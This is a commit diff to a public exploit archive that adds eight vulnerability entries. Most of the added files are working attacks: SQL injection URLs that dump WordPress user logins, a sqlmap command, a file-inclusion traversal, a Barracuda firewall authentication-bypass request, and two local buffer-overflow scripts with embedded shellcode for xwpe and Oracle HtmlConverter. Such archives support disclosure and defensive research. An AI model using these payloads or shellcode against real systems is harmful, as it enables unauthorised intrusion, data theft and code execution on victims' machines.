DB: 2016-01-22

8 new exploits
2016-01-22 05:03:46 +00:00 · 2016-01-22 05:03:46 +00:00 · 257c020493
commit 257c020493
parent 6804f1aa58
9 changed files with 316 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35519,3 +35519,11 @@ id,file,description,date,author,platform,type,port
 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
 39277,platforms/linux/local/39277.c,"Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0
+39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
+39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
+39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
+39281,platforms/php/webapps/39281.txt,"VoipSwitch 'action' Parameter Local File Include Vulnerability",2014-08-08,0x4148,php,webapps,0
+39282,platforms/php/webapps/39282.txt,"WordPress GB Gallery Slideshow Plugin 'wp-admin/admin-ajax.php' SQL Injection Vulnerability",2014-08-11,"Claudio Viviani",php,webapps,0
+39283,platforms/php/webapps/39283.txt,"WordPress FB Gorilla Plugin 'game_play.php' SQL Injection Vulnerability",2014-07-28,Amirh03in,php,webapps,0
+39284,platforms/windows/local/39284.txt,"Oracle HtmlConverter.exe - Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
+39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0
--- a/platforms/hardware/remote/39278.txt
+++ b/platforms/hardware/remote/39278.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69028/info
+
+Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.
+
+An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.
+
+Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest 
--- a/platforms/linux/local/39285.py
+++ b/platforms/linux/local/39285.py
@ -0,0 +1,95 @@
+# Exploit Author: Juan Sacco - http://www.exploitpack.com <
+jsacco@exploitpack.com>
+# Program: xwpe - Windows Editor v1.5.30a-2.1
+# Description: Programming environment and editor for console and X11
+# Tested and developed on:  Kali Linux 2.0 x86 - https://www.kali.org
+#
+# Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer
+# overflow vulnerability because the application fails to perform adequate
+# boundary-checks on user-supplied input.
+#
+# An attacker could exploit this issue to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in a
+# denial-of-service condition.
+#
+# Vendor homepage: http://www.identicalsoftware.com/xwpe
+# Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb
+# MD5: 793a89f7df892c7934be6c2353a6f0f9
+#
+#gdb$ run $(python -c 'print "\x90" * 290  + "DCBA"')
+#Starting program: /usr/bin/xwe $(python -c 'print "\x90" * 290  + "DCBA"')
+#sh: 1: /usr/sbin/gpm: not found
+#
+#  ESI: 0x41414141  EDI: 0x41414141  EBP: 0x41414141  ESP: 0xBFFFF370  EIP:
+0x42434441
+#  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007BError while
+running hook_stop:
+#Cannot access memory at address 0x42434441
+#0x42434441 in ?? ()
+#gdb$ backtrace
+#0  0x42434441 in ?? ()
+#1  0x4f4e2041 in ?? ()
+#2  0x61732054 in ?? ()
+#3  0x21646576 in ?? ()
+#4  0x206f440a in ?? ()
+#5  0x20756f79 in ?? ()
+#6  0x746e6177 in ?? ()
+#7  0x206f7420 in ?? ()
+#8  0x65766173 in ?? ()
+#9  0x6c694620 in ?? ()
+#10 0x003f2065 in ?? ()
+#11 0x00000088 in ?? ()
+#12 0x00000132 in ?? ()
+#13 0x00000006 in ?? ()
+#14 0x00002710 in ?? ()
+#15 0x0000009a in ?? ()
+#16 0xfac9bc00 in ?? ()
+#17 0x00000098 in ?? ()
+#18 0x00000011 in ?? ()
+#19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5
+#20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5
+#21 0x0809927d in ?? ()
+#22 0x0806b23c in ?? ()
+#23 0x08055c78 in ?? ()
+#24 0x080565b5 in ?? ()iles  ESC-F3 Close W.  F4 Search  ^L S.Again  ESC-X
+Quit
+
+#25 0x080574aa in ?? ()
+#26 0x0804b8b8 in ?? ()
+#27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2,
+argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90
+<_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287
+#28 0x08049ea1 in ?? ()
+
+import os,subprocess
+def run():
+  try:
+    print "# xwpe Buffer Overflow by Juan Sacco"
+    print "# It's AGAIN Fuzzing time on unusable exploits"
+    print "# This exploit is for educational purposes only"
+    # JUNK + SHELLCODE + NOPS + EIP
+
+    junk = "\x41"*262
+    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+    nops = "\x90"*124
+    eip = "\x50\xd1\xff\xbf"
+    subprocess.call(["xwpe",' ', junk + shellcode + nops + eip])
+
+  except OSError as e:
+    if e.errno == os.errno.ENOENT:
+        print "Sorry, xwpe not found!"
+    else:
+        print "Error executing exploit"
+    raise
+
+def howtousage():
+  print "Snap! Something went wrong"
+  sys.exit(-1)
+
+if __name__ == '__main__':
+  try:
+    print "Exploit xWPE Local Overflow Exploit"
+    print "Author: Juan Sacco"
+  except IndexError:
+    howtousage()
+run()
--- a/platforms/php/webapps/39279.txt
+++ b/platforms/php/webapps/39279.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69089/info
+
+The WordPress Spreadsheet plugin (wpSS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+wpSS 0.62 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4# 
--- a/platforms/php/webapps/39280.txt
+++ b/platforms/php/webapps/39280.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69105/info
+
+The WordPress HDW Player plugin (Video Player & Video Gallery) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+HDW Player 2.4.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12 
--- a/platforms/php/webapps/39281.txt
+++ b/platforms/php/webapps/39281.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/69109/info
+
+VoipSwitch is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 
+
+https://www.example.com/user.php?action=../../../windows/win.ini%00.jpg 
--- a/platforms/php/webapps/39282.txt
+++ b/platforms/php/webapps/39282.txt
@ -0,0 +1,38 @@
+source: http://www.securityfocus.com/bid/69181/info
+
+The GB Gallery Slideshow plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+GB Gallery Slideshow 1.5 is vulnerable; other versions may also be affected. 
+
+POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Accept-language: en-us,en;q=0.5
+Accept-encoding: gzip,deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+User-agent: sqlmap/1.0-dev-5b2ded0 (http://sqlmap.org)
+Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
+Host: 10.0.0.67
+Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C5ae003a01e51c11e530c14f6149c9d07; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C6988bc86de7b7790fca51ea294e171a1; redux_current_tab=3
+Pragma: no-cache
+Cache-control: no-cache,no-store
+Content-type: application/x-www-form-urlencoded; charset=utf-8
+Content-length: 120
+Connection: close
+
+action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=[SQL_Injection]
+
+
+Exploit via sqlmap:
+
+sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://www.example.com/wp-admin/admin-ajax.php" \
+--data="action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2" -p selected_group --dbms=mysql 
+
+---
+Place: POST
+Parameter: selected_group
+    Type: AND/OR time-based blind
+    Title: MySQL > 5.0.11 AND time-based blind
+    Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5)
+    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+---
--- a/platforms/php/webapps/39283.txt
+++ b/platforms/php/webapps/39283.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/69222/info
+
+FB Gorilla plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users-- 
--- a/platforms/windows/local/39284.txt
+++ b/platforms/windows/local/39284.txt
@ -0,0 +1,134 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt
+
+
+Vendor:
+===============
+www.oracle.com
+
+
+Product:
+========================================
+Java Platform SE 6 U24 HtmlConverter.exe
+Product Version: 6.0.240.50
+
+
+The HTML Converter is part of Java SE binary part of the JDK and Allows web
+page authors to explicitly target
+the browsers and platforms used in their environment when modifying their
+pages.
+
+
+
+Vulnerability Type:
+============================
+Buffer Overflow
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+When calling htmlConverter.exe with specially crafted payload it will cause
+buffer overflow executing arbitrary attacker supplied code.
+This was a small vulnerability included as part of the overall Oracle CPU
+released on January 19, 2016.
+
+Reference:
+http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
+
+
+
+registers ...
+
+EAX FFFFFFFE
+ECX FFFFFFFE
+EDX 0008E3C8
+EBX 7EFDE000
+ESP 0018FEB4
+EBP 0018FF88
+ESI 00001DB1
+EDI 00000000
+EIP 52525252                          <-------- "RRRR" \x52
+C 0  ES 002B 32bit 0(FFFFFFFF)
+P 0  CS 0023 32bit 0(FFFFFFFF)
+A 1  SS 002B 32bit 0(FFFFFFFF)
+Z 0  DS 002B 32bit 0(FFFFFFFF)
+S 0  FS 0053 32bit 7EFDD000(FFF)
+T 0  GS 002B 32bit 0(FFFFFFFF)
+D 0
+
+
+
+Exploit code(s):
+===============
+
+###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "
+ #EIP @ 2493
+pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "
+#EIP 2469 - 2479
+
+#shellcode to pop calc.exe Windows 7 SP1
+sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
+"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
+"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
+"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
+"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
+
+
+#JMP ESP kernel32.dll
+rp=struct.pack('<L', 0x76E72E2B)
+
+
+payload="A"*2469+rp+"\x90"*10+sc
+subprocess.Popen([pgm, payload], shell=False)
+
+
+Disclosure Timeline:
+=====================================
+Vendor Notification: August 28, 2015
+January 20, 2016  : Public Disclosure
+
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+
+Severity Level:
+===============
+Medium
+
+
+
+Description:
+=============================================================
+
+Vulnerable Product:     [+] Java SE 6 U24 HtmlConverter.exe
+
+=============================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx